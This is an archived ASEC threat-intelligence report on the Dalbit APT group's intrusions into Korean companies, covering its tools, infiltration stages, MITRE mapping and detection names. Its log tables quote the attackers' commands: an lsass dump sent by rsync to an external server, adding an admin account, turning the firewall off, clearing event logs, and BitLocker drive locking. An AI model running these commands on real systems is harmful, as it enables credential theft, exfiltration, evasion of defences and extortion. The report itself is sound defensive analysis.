{
	"id": "b16b8f36-455e-4a38-9852-252c5962f39d",
	"created_at": "2026-04-06T00:07:56.880578Z",
	"updated_at": "2026-04-10T13:13:07.400269Z",
	"deleted_at": null,
	"sha1_hash": "47b8da3bea0c3580d92023398518498a0e33c21a",
	"title": "Dalbit (m00nlight): Chinese Hacker Group's APT Attack Campaign - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1029528,
	"plain_text": "Dalbit (m00nlight): Chinese Hacker Group's APT Attack Campaign -\r\nASEC\r\nBy ATCP\r\nPublished: 2023-02-13 · Archived: 2026-04-05 13:58:17 UTC\r\n0. Overview\r\nThis report is a continuation of the “Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies” post that was\r\nuploaded on August 16, 2022 and follows the group’s activities since that post.\r\nThis group has always relied on open-source tools and lacked any distinct characteristics to profile them due to the lack of\r\nPDB information. Additionally, the amount of information that could be collected was limited unless the affected Korean\r\ncompanies specifically asked for an investigation since the threat actor’s C2 (Command\u0026Control) server abused the servers\r\nof the Korean companies. However, after the post was uploaded and a portion of the Korean company servers used by the\r\nthreat actor were blocked, the threat actor began to use a hosting server called “*.m00nlight.top” as their C2 and download\r\nserver. Thus, the ASEC team decided to call this group Dalbit (m00nlight.top) after the Korean word for ‘Moonlight’.\r\nThis group has had more than 50 confirmed attack attempts on Korean companies since 2022. Most of the attacked\r\ncompanies were mid to small companies while a portion was major companies. The team has confirmed that 30% of the\r\ninfected companies were using a certain Korean groupware solution. It is currently difficult to check whether this groupware\r\nproduct has a vulnerability or not, but if a server that is this exposed has a vulnerability, then there is a chance that\r\ncompanies could be affected gravely through the leakage of confidential information and ransomware behavior.\r\nFurthermore, this Dalbit group leaves some infected companies as proxies and download servers to later use them as means\r\nto communicate with the threat actor upon infiltration of another company.\r\nTherefore, we strongly recommend performing an internal security check if users suspect that they have been attacked by\r\nthis Dalbit group. The team asks that users send a report to AhnLab and take preemptive measures to prevent secondary\r\nharm and potential damage to other companies.\r\n1. Affected Korean Companies (Industry Type)\r\nListed below are the 50 companies that were confirmed to have been affected since 2022. Companies that have not been\r\nclearly confirmed were excluded from this list. It is possible that more companies could have been affected.\r\nFigure 1. Industry types of companies that the Dalbit group tried to attack\r\nThe following are the descriptions of each industry type.\r\nTechnology: Companies that handle software or hardware\r\nIndustrial: Manufacturing companies that handle machinery, paint jobs, steel, metals, etc.\r\nChemical: Cosmetic, pharmaceutical, and plastic companies\r\nConstruction: Associations or organizations related to construction or construction companies\r\nAutomobile: Automobile-related manufacturing companies\r\nSemiconductor: Semiconductor-related manufacturing companies \r\nEducation: Educational companies\r\nWholesale: Wholesalers\r\nMedia: Printing and media companies\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 1 of 16\n\nFood: Food companies\r\nShipping: Shipping companies\r\nHospitality: Leisure or tourist accommodation companies\r\nEnergy: Energy companies\r\nShipbuilding: Shipbuilding companies\r\nConsulting: Management consulting companies\r\n2. Flow and Characteristics\r\n2.1. Summary Diagram\r\nFigure 2. Summary diagram of Dalbit group’s infiltration process\r\nThe above diagram shows the threat actor’s infiltration process into Company B. A brief summary of this flow is in the table\r\nbelow.\r\n1) Initial Access\r\nThe threat actor targets web servers or SQL servers, which they gain access to by exploiting\r\nvulnerabilities. They then attempt to control the systems with tools such as WebShell.\r\n2) Command \u0026 Control\r\nVarious hacking tools are downloaded through WebShell. Hacking tools include various binaries such\r\nas privilege escalation tools, proxy tools, and network scanning tools.\r\n3) Proxy \u0026 Internal Reconnaissance\r\nProxy: The threat actor installs a proxy tool such as FRP (Fast Reverse Proxy) before attempting to\r\nconnect to 2-1) a hosting server built by the threat actor or 2-2) another previously infected company’s\r\nserver (Company A) via Remote Desktop (RDP).\r\nInternal Reconnaissance: Tools such as network scanning tools and account theft tools are used for\r\ninternal reconnaissance and obtaining information.\r\n4) Lateral Movement\r\nThe obtained information is used to move to another connectible server or PC. Afterward, a proxy tool\r\n(FRP) is also installed on the PC that has successfully been reached through lateral movement, creating\r\nan environment which allows the threat actor to connect via RDP. The required privilege level is then\r\nacquired by either adding a specific account or through a credential theft tool like Mimikatz.\r\n5) Impact\r\nUltimately, after the threat actor steals all the information they desire, they use BitLocker to lock\r\ncertain drives and demand a ransom.\r\nTable 1. Explanation of the infiltration summary diagram\r\nThe following are major characteristics of the Dalbit group.\r\n2.2. Characteristics of Dalbit\r\nList Description\r\nThreat Actor’s C2 Servers Download and C2 (Command\u0026Control) servers: Korean company or\r\nhosting servers\r\nOver half of these servers are exploited Korean company servers\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 2 of 16\n\nList Description\r\n*.m00nlight.top or IP format addresses are often used for the hosting\r\nservers\r\nAttempts Control Through\r\nRDP\r\nUsually attempts to access RDP after infection\r\nEither a proxy tool or Gotohttp is used for RDP connection\r\nProxy Tools Major proxy tools used include FRP, LCX (Htran),\r\nNPS,  ReGeorg , etc.\r\nAdd User Account\r\nA net command is used to add an account\r\nAccount credentials (ID: “main” / PW: “ff0.123456”)\r\nOpen-source Tool Mostly uses open-source tools that are publicly available\r\nA lot of tools are written in Chinese\r\nEvasion\r\nVMProtect is used to prevent hacking tools from being detected\r\nSecurity event logs are deleted\r\nExtorted Information\r\nUser account credentials\r\nEmail information\r\nScreen leak\r\nInstalled program information\r\nTable 2. Characteristics of Dalbit\r\n3. Tools Used and Infiltration Process\r\n3.1. Tools and Malware Used\r\nWebShell Downloader\r\nPrivilege\r\nEscalation\r\nProxy\r\nInternal\r\nReconnaissance\r\nGodzilla\r\nASPXSpy\r\nAntSword\r\nChina\r\nChopper\r\nCertutil (Windows\r\nCMD)\r\nBitsadmin (Windows\r\nCMD)\r\nBadPotato\r\nJuicyPotato\r\nSweetPotato\r\nRottenPotato\r\nEFSPotato\r\nCVE-2018-8639\r\nCVE-2019-1458\r\nFRP\r\nLCX\r\nNPS\r\nReGeorg\r\nFScan\r\nNbtScan\r\nTCPScan\r\nGoon\r\nNltest (Windows CMD)\r\nLateral\r\nMovement\r\nInformation Leak and\r\nCollection\r\nBackdoor\r\nFile\r\nEncryption\r\nEvasion\r\nRDP\r\nPsExec\r\nRemCom\r\nWinexec\r\nWevtutil (Windows\r\nCMD)\r\nWMI (Windows CMD)\r\nProcDump\r\nDumpert\r\nEML Extractor\r\n(created)\r\nMimikatz\r\nRsync\r\nCobaltStrike\r\nMetaSploit\r\nBlueShell\r\nLadon\r\nBitLocker\r\n(Windows\r\nCMD)\r\nSecurity log deletion\r\n(Windows CMD)\r\nFirewall OFF (Windows\r\nCMD)\r\nAttempts to delete AV\r\nproducts\r\nVMProtect Packing\r\nTable 3. Malware and hacking tools used by Dalbit\r\nOnly one tool for leaking emails seems to have been made by the group themselves. The rest are normal Windows programs\r\nor tools that can easily be found online.\r\n3.2. Infiltration Process\r\n3.2.1. Initial Infiltration\r\nIt is assumed that their attack targets are usually servers with a specific Korean groupware installed on them, email servers\r\n(Exchange Server), and SQL servers. The threat actor exploited either file upload vulnerabilities or WebLogic vulnerabilities\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 3 of 16\n\nsuch as CVE-2017-10271 to upload their WebShell. A portion appeared to have used a SQL server command prompt\r\n(xp_cmdshell). \r\nThe most frequently used WebShells are Godzilla, ASPXSpy, AntSword, and China Chopper in that order. Aside from these,\r\nseveral other WebShells were also found.\r\nThe installation paths of the WebShells are as follows.\r\n– Job recruitment (File upload vulnerability)\r\nD:\\WEB\\********recruit\\css\\1.ashx\r\nD:\\WEB\\********recruit\\css\\4.ashx\r\nD:\\WEB\\********recruit\\common\\conf.aspx\r\n...\r\n– File upload vulnerability\r\nD:\\UploadData\\***********\\****_File\\Data\\Award\\1.ashx\r\nD:\\UploadData\\***********\\****_File\\Data\\Award\\2.aspx\r\nD:\\UploadData\\***********\\****_File\\Data\\Award\\3.aspx\r\nD:\\**WebService\\********\\*****Editor\\sample\\photo_uploader\\File\\conf.aspx\r\nD:\\**WebService\\********_ThesisSubmission\\Include\\file.aspx\r\n...\r\n– Certain groupware\r\nD:\\Web\\(Groupware)\\cop\\1.ashx\r\nD:\\Web\\(Groupware)\\app\\4.ashx\r\nD:\\Web\\(Groupware)\\bbs\\4.asmx\r\nD:\\Web\\(Groupware)\\erp\\tunnel.aspx (ReGeorg)\r\nD:\\inetpub\\(Groupware)\\image\\2.asmx\r\nD:\\inetpub\\(Groupware)\\image\\2.aspx\r\nC:\\(Groupware)\\Web\\(Groupware)\\cop\\conf.aspx\r\nC:\\(Groupware)\\Web\\(Groupware)\\cop\\1.ashx\r\nC:\\(Groupware)\\Web\\(Groupware)\\cop\\1.asmx\r\nC:\\(Groupware)\\Web\\(Groupware)\\cop\\1.aspx\r\n…\r\n– Email server (Exchange Server)\r\nD:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\aa.aspx\r\nD:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\11.aspx\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET\r\nFiles\\root\\91080f08\\2694eff0\\app_web_defaultwsdlhelpgenerator.aspx.cdcab7d2.sjx_41yb.dll\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\root\\91080f08\\2694eff0\\app_web_ldaj2kwn.dll\r\n…\r\n–\r\n Weblogic D:\\***\\wls1035\\domains\\************\\servers\\*******\\tmp\\************\\uddiexplorer\\gcx62x\\war\\modifyregistryhelp.jsp\r\nD:\\***\\wls1035\\domains\\************\\servers\\*******\\tmp\\************\\wls-wsat\\zfa3iv\\war\\eee.jsp\r\nD:\\***\\wls1035\\domains\\************\\servers\\*******\\tmp\\************\\wls-wsat\\zfa3iv\\war\\error.jsp\r\nD:\\Oracle\\**********\\user_projects\\domains\\*************\\servers\\WLS_FORMS\\tmp\\************\\wls-wsat\\tcsxmg\\war\\123.jsp\r\nD:\\Oracle\\**********\\user_projects\\domains\\*************\\servers\\WLS_FORMS\\tmp\\************\\wls-wsat\\tcsxmg\\war\\test.jsp  \r\n  D:\\Oracle\\**********\\user_projects\\domains\\*************\\servers\\WLS_FORMS\\tmp\\************\\wls-wsat\\tcsxmg\\war\\aaa.jsp\r\n…\r\n–Tomcat\r\nC:\\(Tomcat)\\webapps\\dd\\sb.jsp\r\nC:\\(Tomcat)\\webapps\\ddd\\index.jsp\r\nC:\\(Tomcat)\\webapps\\docs\\update.jsp\r\nC:\\(Tomcat)\\webapps\\tmp\\shell.jsp\r\nTable 4. Paths where WebShells were uploaded\r\n3.2.2. Download\r\nThe threat actor downloads other hacking tools through default Windows programs. Since WebShells are normally used in\r\ninfiltration, parent processes, excluding command processes like cmd, are run by web server processes such as w3wp.exe,\r\njava.exe, sqlserver.exe, and tomcat*.exe. The downloaded files include privilege escalation tools, proxy tools, and network\r\nscanning tools, all of which are required by the threat actor. The download command is as follows.\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 4 of 16\n\n(Additionally, the full addresses of the Korean companies that have been exploited will not be disclosed.)\r\n1) Certutil\r\nTable 5. Certutil download log\r\n2) Bitsadmin\r\nTable 6. Bitsadmin download log\r\nThe hacking tools and malware downloaded by the threat actor were usually found in the following paths. \r\n%ALLUSERSPROFILE%\r\n%SystemDrive%\\temp\r\n%SystemDrive%\\perflogs\r\n%SystemDrive%\\nia\r\n%SystemDrive%\\.tmp\r\n%SystemRoot%\r\n%SystemRoot%\\debug\r\n%SystemRoot%\\temp\r\nTable 7. Major directories used by the Dalbit group\r\nTherefore, the files in these paths should be checked if users suspect that they have been infiltrated.\r\n3.2.3. Privilege Escalation and Account Addition\r\nThe threat actor mainly used Potato (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato) and PoC (CVE-2018-\r\n8639, CVE-2019-1458), which has been published on GitHub, for privilege escalation. After privilege escalation, they\r\ncharacteristically add the following account.\r\nThe below sp.exe is the SweetPotato tool.\r\n\u003e sp.exe “whaomi” (Privilege check)\r\n\u003e sp.exe “netsh advfirewall set allprofiles state off” (Firewall OFF)\r\n\u003e sp.exe “net user main ff0.123456 /add \u0026 net localgroup administrators main /add” (Add account)\r\nTable 8. SweetPotato usage log\r\nThe point of focus here is the name of the account added by the threat actor. Threat actor accounts with the name “main”\r\nhave been found in other infiltrated company servers.\r\nAside from adding accounts, the threat actor would also use stolen admin accounts.\r\n\u003e wmic  /node:127.0.0.1 /user:storadmin /password:r*****1234!@#$  process call create “cmd.exe /c\r\nc:\\temp\\s.bat”\r\nTable 9. Admin account execution log\r\n3.2.4. Proxy Settings\r\nAfter infiltrating a server, the threat actor initiates access via proxy to use RDP communications. FRP and LCX were the\r\nmainly used proxy tools, and there have been cases where ReGeorg, NPS, or RSOCKS was found in some companies.\r\nAdditionally, multiple proxy tools including FRP and LCX were found in one area of a certain company that was infiltrated.\r\nMultiple FRP configuration files (.ini) would also be discovered in cases where internal propagation had occurred. We\r\nbelieve that the threat actor installs additional FRPs and uses multiple configuration files when an accessible PC has a lot to\r\ngain. Furthermore, the LCX used by this group has the same features as the open-source LCX, but its version is not the same\r\nas the one uploaded to GitHub, meaning that a binary that was arbitrarily compiled by a Chinese person was used. \r\nProxy tools like FRP and LCX differ in terms of forwarding methods and supported protocols. However, since their\r\ndifferences, actual infection cases, recreation, and network packets have all been covered in the TI report, “Analysis Report\r\non Attack Cases Exploiting Various Remote Control Tools,” they will not be reiterated in this post. \r\n1) FRP(FAST REVERSE PROXY)\r\nFRP configuration files (.ini) were found in all servers and PC devices infiltrated by this group. The following is an actual\r\ncase of an infiltrated company.\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 5 of 16\n\nFigure 3. FRPC configuration file (m00nlight.top) found in an infiltrated company\r\nIn particular, the Dalbit group usually used the Socks5 protocol to communicate. The Socks5 protocol is a layer 5 protocol in\r\nthe 7 OSI layers. It can handle various requests such as HTTP, FTP, and RDP since it is between layer 4 and 7. Therefore, if\r\nthe threat actor uses a proxy connection tool that can handle Socks5, such as Proxifier, remote control through RDP becomes\r\npossible. If a connection can be established to an internal PC, lateral movement can also be achieved. Thus, if the\r\nconfiguration file is set as a Socks5 protocol, the threat actor will have more freedom as additional modifications will no\r\nlonger be required to handle various requests.\r\nFigure 4. Example of Socks5 usage\r\nThe following are FRP filenames and commands used by the threat actor. The list is in a descending order from most to least\r\nused.\r\nFRP filenames\r\nupdate.exe\r\ndebug.exe\r\nmain.exe\r\ninfo.exe\r\nAgent.exe\r\nfrpc.exe\r\ntest.exe\r\nzabbix.exe\r\nwinh32.exe\r\ncmd.exe\r\nTable 10. FRP filenames\r\nFRP commands\r\n\u003e update.exe -c frpc.ini\r\n\u003e update.exe -c 8080.ini\r\n\u003e update.exe -c 8.ini\r\n\u003e info.zip -c frpc__8083.ini\r\n\u003e debug.exe -c debug.ini\r\n\u003e debug.exe -c debug.log\r\n\u003e debug.exe -c debug.txt\r\n\u003e frpc.exe -c frpc__2381.ini\r\n\u003e cmd.exe /c c:\\temp\\****\\temp\\frpc.ini\r\n…\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 6 of 16\n\nTable 11. FRP execution log\r\nIn certain companies, the FRP was registered to the task scheduler (schtasks) under the name “debug” to maintain its\r\npersistence. As shown in Table 12, the team confirmed the execution of a registered scheduler.\r\n\u003e schtasks  /tn debug /run\r\nTable 12. Task scheduler execution log\r\n2) LCX(HTRAN)\r\nDalbit used an LCX (Htran) binary compiled by a certain Chinese person. This has the same features as the existing binary,\r\nbut it also includes the nickname of the binary creator.\r\nFigure 5. Screen that is displayed upon executing the LCX used by the Dalbit group (By 折羽鸿鹄)\r\nWe can confirm through this that the nickname of the person who had created the binary is “折羽鸿鹄” (QQ:56345566). It\r\nis highly unlikely that this developer is the threat actor in question; however, since this binary cannot be downloaded\r\nthrough a simple search online, it is assumed that the threat actor has a connection to China.\r\nThe installed filenames and executables are as follows:\r\nLCX filenames\r\nlcx3.exe\r\nlcx.exe\r\nupdate.exe\r\nTable 13. LCX filenames\r\nLCX commands\r\n\u003e update.exe -slave 1.246.***.*** 110 127.0.0.1 3389\r\n\u003e lcx3.exe -slave 222.239.***.*** 53 127.0.0.1 3389\r\n…\r\nTable 14. LCX command log\r\nThe above LCX C2 is a Korean company server and has been concealed.\r\n3.2.5. Internal Reconnaissance\r\nFscan and NBTScan have been commonly used for network scans, but the usage of TCP Scan and Goon have also been\r\nconfirmed for some cases.\r\nGoon is a network scanning tool made with Golang that not only allows basic port scanning, but scanning for Tomcat,\r\nMSSQL, and MYSQL accounts as well. We can see that this tool was also made in Chinese.\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 7 of 16\n\nFigure 6. Screen that is displayed upon executing Goon\r\n3.2.6. Information Extortion\r\nLSASS Dump information and EML files of certain accounts are usually the information that is stolen. It has been\r\nconfirmed that installed programs are checked through a WMIC command or a screenshot of the affected PC is sent to the\r\nthreat actor’s server at regular intervals according to the companies.\r\n1) Credential Extraction (LSASS Dump)\r\nAccording to the target, the threat actor would choose to not install Mimikatz and attempt to extract credentials instead. This\r\nis a method that dumps the Lsass.exe process. Credential information can be obtained from a PC with tools like Mimikatz or\r\nPypykatz since they can be found within the dump file. Additionally, a detailed explanation of Mimikatz can be found in the\r\nTI report, “Analysis Report on Internal Web Spreading Methods Using Mimikatz“.\r\nThe following method is how the threat actor stole credentials without Mimikatz.\r\n1-1) Dumpert\r\nOpen-source Dumpert is an API hooking evasion tool that operates according to the target OS system and uses the\r\nMiniDumpWriteDump() API to dump the lsass.exe process. The threat actor modified the code to change the path of the\r\ndump file and remove features like log output.\r\nFigure 7. Left (open-source Dumpert) vs. right (Dumper used by the Dalbit group)\r\nThe above figure shows that the two versions are the same aside from the different paths and the removal of the output\r\nstring.\r\nThe following table displays all of the “%SystemRoot%\\temp” dump file paths that have currently been found.\r\n%SystemRoot%\\temp\\duhgghmpert.dmp\r\n%SystemRoot%\\temp\\dumpert.dmp\r\n%SystemRoot%\\temp\\tarko.dmp\r\n%SystemRoot%\\temp\\lsa.txt\r\n…\r\nTable 15. Lsass dump file paths\r\n1-2 ) Procdump\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 8 of 16\n\nProcdump is a normal utility program provided by Microsoft and offers the process dump feature. The threat actor\r\nperformed a dump like the one in Figure 8 with this tool.\r\nFigure 8. Output upon executing Procdump\r\nAfterward, the threat actor used a tool called Rsync (Remote Sync) to send the dump file to their own server. The following\r\nis an actual example of information theft attempted by the threat actor.\r\n\u003e svchost.exe -accepteula -ma lsass.exe web_log.dmp\r\n\u003e rsync  -avz –port 443 web_log.zip test@205.185.122[.]95::share/web_log.zip\r\nTable 16. Procdump execution and rsync usage log\r\n2) Email Extraction\r\nFigure 9. Screen displayed upon executing email extraction tool\r\nThis sample is an email extraction tool developed with Golang and presumably the only known tool developed by the threat\r\nactor themselves. This tool offers the ability to target a company’s Exchange email server and extract a specific account’s\r\nemail with EWS (Exchange Web Service) as an EML file. Arguments include the Exchange server address, account name,\r\nNTLM password hash of said account, date and time, etc. When launched, the tool extracts every email from the mailboxes\r\nof the target account according to the time received as an argument and saves them as an EML file.\r\nFor reference, the PDB information of this binary is “fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff”and is\r\nmeaningless.\r\nFigure 10. PDF information of the email extraction tool\r\n3) Screen Leak\r\nThe threat actor sent screenshots from certain PCs to their own server. While a binary that takes screenshots of the current\r\nscreen has not been found as of yet, the threat actor’s server where the infected PC’s screenshots were being sent has been\r\ndiscovered. Screenshots from a certain company’s infiltrated PC sent pictures every 5-10 seconds.\r\nOutgoing server of threat actor’s screenshots: hxxp://91.217.139[.]117:8080/1.bat\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 9 of 16\n\nFigure 11. Actual PC screenshot sent from a certain affected company\r\nOnly images were sent. The PC could not be controlled remotely and no audio was outputted either.\r\nAlso, the threat actor’s server (91.217.139[.]117) where the screenshots were being sent was also being used as a download\r\nserver for another company.\r\nTable 17. A different log from the threat actor’s server (91.217.139[.]117)\r\n4) Lookup Installed Programs and Login Information\r\nThe threat actor used a WMIC command to check installed programs.\r\n\u003e wmic product get name,version\r\nTable 18. How the threat actor looked up installed programs\r\nFigure 12. List of installed programs and command example (WMIC)\r\nFurthermore, the domain account credentials that caused certain event IDs to occur in the event log were collected. The\r\ncreated file is saved in c:\\temp\\EvtLogon.dat.\r\nEvent ID Meaning\r\n4624 Login successful\r\n4768 Kerberos authentication request\r\n4776 NTLM authentication attempt\r\nTable 19. Meanings of the event IDs used by the threat actor\r\n\u003e wevtutil qe security /q:”Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]” /f:text\r\n/rd:true \u003e\u003e c:\\temp\\EvtLogon.dat\r\nTable 20. wevtutil command log\r\n3.2.7. File Encryption\r\nDetails about this matter have been covered in a past blog post. The threat actor used BitLocker, a Windows utility, to\r\nencrypt certain drives and demand ransoms. Currently, more affected companies are still being found.\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 10 of 16\n\nBitLocker commands\r\n\u003e “C:\\Windows\\System32\\BitLockerWizardElev.exe” F:\\ T \r\n\u003e manage-bde  -lock  -ForceDismount F:\r\n\u003e manage-bde  -lock  -ForceDismount e:\r\n\u003e “c:\\windows\\system32\\bitlockerwizardelev.exe” e:\\ t\r\n\u003e “c:\\windows\\system32\\bitlockerwizardelev.exe” f:\\ u\r\nTable 21. BitLocker log\r\nFigure 13 is the ransom note used by the threat actor. The threat actor used anonymous mailing services such as\r\nstartmail.com and onionmail.com.\r\nFigure 13. Ransom note that was shown in a previous blog post\r\nThe command assumed to be for downloading the ransom note is as follows.\r\nTable 22. Log assumed to display the ransom note being downloaded\r\n3.2.8. Evasion\r\n1) VMPROTECT PACKING\r\nWhen the binary was detected after being uploaded, the threat actor packed it with VMProtect to try and avoid detection.\r\n– Privilege escalation tools\r\n%ALLUSERSPROFILE%\\badpotatonet4.exe\r\n%ALLUSERSPROFILE%\\BadPotatoNet4.vmp.exe\r\n%ALLUSERSPROFILE%\\SweetPotato.exe\r\n%ALLUSERSPROFILE%\\SweetPotato.vmp.exe\r\n%ALLUSERSPROFILE%\\jc.vmp.exe\r\n%SystemDrive%\\nia\\juicypotato.vmp1.exe\r\n%SystemDrive%\\nia\\juicypotato.vmp.exe\r\n…\r\n– Proxy tools\r\nE:\\WEB\\*****\\data\\frpc.vmp.exe\r\n%ALLUSERSPROFILE%\\lcx.exe\r\n%ALLUSERSPROFILE%\\lcx_VP.exe\r\n%SystemDrive%\\Temp\\lcx.exe\r\n%SystemDrive%\\Temp\\lcx_VP.exe\r\n%SystemDrive%\\Temp\\svchost.exe (FRP)\r\n%SystemDrive%\\Temp\\frpc.vmp.exe\r\n…\r\nTable 23. File packed with VMP\r\n2) Windows Event Log Deletion Using Wevtutil\r\nRemoval of security event logs\r\n\u003e cmd.exe /c wevtutil cl security\r\nRemoval of application logs\r\n\u003e cmd.exe wevtutil.exe el\r\n\u003e cmd.exe wevtutil.exe cl “application”\r\nTable 24. Deletion of Windows event logs\r\n3) Firewall OFF\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 11 of 16\n\nsp.exe “netsh advfirewall set allprofiles state off”\r\nTable 25. Firewall OFF\r\n4. Conclusion\r\nThe Dalbit hacking group attempted attacks against vulnerable Korean company servers, and logs are being reported not\r\nonly from mid-sized and smaller businesses, but also from some large companies. In particular, 30% of the affected\r\ncompanies were found to have been using a certain Korean groupware product. Moreover, this group uses publicly available\r\ntools, from the WebShell used in the early stages to the ransomware used at the end. Among these tools, there is a proxy tool\r\nthat is assumed to have been obtained from a Chinese community, a tool with Chinese documentation, and a Chinese tool\r\nnot mentioned in this post. It can be assumed that the threat actor has at least a partial connection with China, considering\r\ntheir frequent usage of Chinese tools.\r\nIf a server admin suspects that their system has been infected, they are advised to check their IOC along with the\r\naforementioned download paths and account name (“main”) often used by the threat actor. If suspicions are confirmed, then\r\nit is advised to immediately report your situation to AhnLab in order to minimize additional harm. Furthermore, admins\r\nshould prevent vulnerability attacks by updating their servers to the newest version for vulnerability patches, and\r\nmaintenance is especially needed for servers that are open externally but not managed.\r\n5. IOC\r\nFor reference, the IP addresses of Korean company servers abused by the threat actor will not be disclosed on the ASEC\r\nblog.\r\nMitre Attack\r\nExecution Persistence Privilege Escalation\r\nCredential\r\nAccess\r\nDiscovery\r\nDefense\r\nEvasion\r\nLateral\r\nMovem\r\n– Command and\r\nScripting\r\nInterpreter(T1059)\r\n– Windows\r\nManagement\r\nInstrumentation(T1047)\r\n– System\r\nService(T1569)\r\n– Scheduled\r\nTask/Job(T1053)\r\n– Create\r\nAccount(T1136)\r\n– Server Software\r\nComponent(T1505)\r\n– Account\r\nManipulation(T1098)\r\n– Access Token\r\nManipulation(T1134)\r\n– Exploitation for\r\nPrivilege\r\nEscalation(T1068)\r\n– OS\r\nCredential\r\nDumping\r\n(T1003)\r\n– Remote System\r\nDiscovery(T1018)\r\n– Network\r\nService\r\nDiscovery(T1046)\r\n– Impair\r\nDefenses(T1562)\r\n– Indicator\r\nRemoval(T1070)\r\n– Remot\r\nServices\r\n– Latera\r\nTransfer\r\nTable 26. MITRE Attack\r\nDetection Names\r\nWebShell/Script.Generic (2020.12.11.09)\r\nWebShell/ASP.ASpy.S1361 (2021.02.02.03)\r\nWebShell/ASP.Generic.S1855 (2022.06.22.03)\r\nWebShell/ASP.Small.S1378 (2021.02.24.02)\r\nWebShell/JSP.Godzilla.S1719(2021.12.03.00)\r\nWebShell/JSP.Chopper.SC183868(2022.10.15.01)\r\nWebShell/JSP.Generic.S1363 (2021.01.27.03)\r\nBackdoor/Script.Backdoor (2015.01.04.00)\r\nWebShell/JSP.Generic.S1956 (2022.11.14.00)\r\nTrojan/Script.Frpc (2022.12.17.00)\r\nJS/Webshell (2011.08.08.03)\r\nHackTool/Win.Fscan.C5334550(2023.01.27.00)\r\nHackTool/Win.Fscan.C5230904(2022.10.08.00)\r\nHackTool/Win.Fscan.R5229026(2022.10.07.03)\r\nTrojan/JS.Agent(2022.03.16.02)\r\nUnwanted/Win32.TCPScan.R33304(2012.08.17.00)\r\nHackTool/Win.Scanner.C5220929(2022.08.09.02)\r\nHackTool/Win.SweetPotato.R506105 (2022.08.04.01)\r\nExploit/Win.BadPotato.R508814 (2022.08.04.01)\r\nHackTool/Win.JuicyPotato.R509932 (2022.08.09.03)\r\nHackTool/Win.JuicyPotato.C2716248 (2022.08.09.00)\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 12 of 16\n\nExploit/Win.JuicyPotato.C425839(2022.08.04.01)\r\nExploit/Win.SweetPotato.C4093454 (2022.08.04.01)\r\nTrojan/Win.Escalation.R524707(2022.10.04.02)\r\nTrojan/Win.Generic.R457163(2021.12.09.01)\r\nHackTool/Win64.Cve-2019-1458.R345589(2020.07.22.06)\r\nMalware/Win64.Generic.C3164061 (2019.04.20.01)\r\nMalware/Win64.Generic.C3628819 (2019.12.11.01)\r\nExploit/Win.Agent.C4448815 (2021.05.03.03)\r\nTrojan/Win.Generic.C4963786 (2022.02.11.04)\r\nTrojan/Win.Exploit.C4997833 (2022.03.08.01)\r\nExploit/Win.Agent.C5224192 (2022.08.17.00)\r\nExploit/Win.Agent.C5224193 (2022.08.17.00)\r\nTrojan/Win32.RL_Mimikatz.R290617(2019.09.09.01)\r\nTrojan/Win32.Mimikatz.R262842(2019.04.06.00)\r\nTrojan/Win.Swrort.R450012(2021.11.14.01)\r\nHackTool/Win.Lsassdump.R524859(2022.10.05.00)\r\nHackTool/Win.ProxyVenom.C5280699(2022.10.15.01)\r\nUnwanted/Win.Frpc.C5222534 (2022.08.13.01)\r\nUnwanted/Win.Frpc.C5218508 (2022.08.03.03)\r\nUnwanted/Win.Frpc.C5218510 (2022.08.03.03)\r\nUnwanted/Win.Frpc.C5218513 (2022.08.03.03)\r\nHackTool/Win.Frpc.5222544 (2022.08.13.01)\r\nHackTool/Win.Frp.C4959080 (2022.02.08.02)\r\nHackTool/Win.Frp.C5224195 (2022.08.17.00)\r\nUnwanted/Win.Frpc.C5162558 (2022.07.26.03)\r\nMalware/Win.Generic.C5173495 (2022.06.18.00)\r\nHackTool/Win.LCX.C5192157 (2022.07.04.02)\r\nHackTool/Win.LCX.R432995(2023.01.06.01)\r\nHackTool/Win.Rsocx.C5280341(2022.10.15.00)\r\nBackdoor/Win.BlueShell.C5272202(2022.10.05.00)\r\nTrojan/Win.BlueShell.C5280704(2022.10.15.01)\r\nBackdoor/Win.CobaltStrike.R360995(2022.09.20.00)\r\nUnwanted/Win.Extractor.C5266516(2022.10.01.00)\r\nTrojan/Win.RemCom.R237878(2023.01.07.00)\r\n[IOC]\r\nMD5 (Excluding normal files)\r\n– 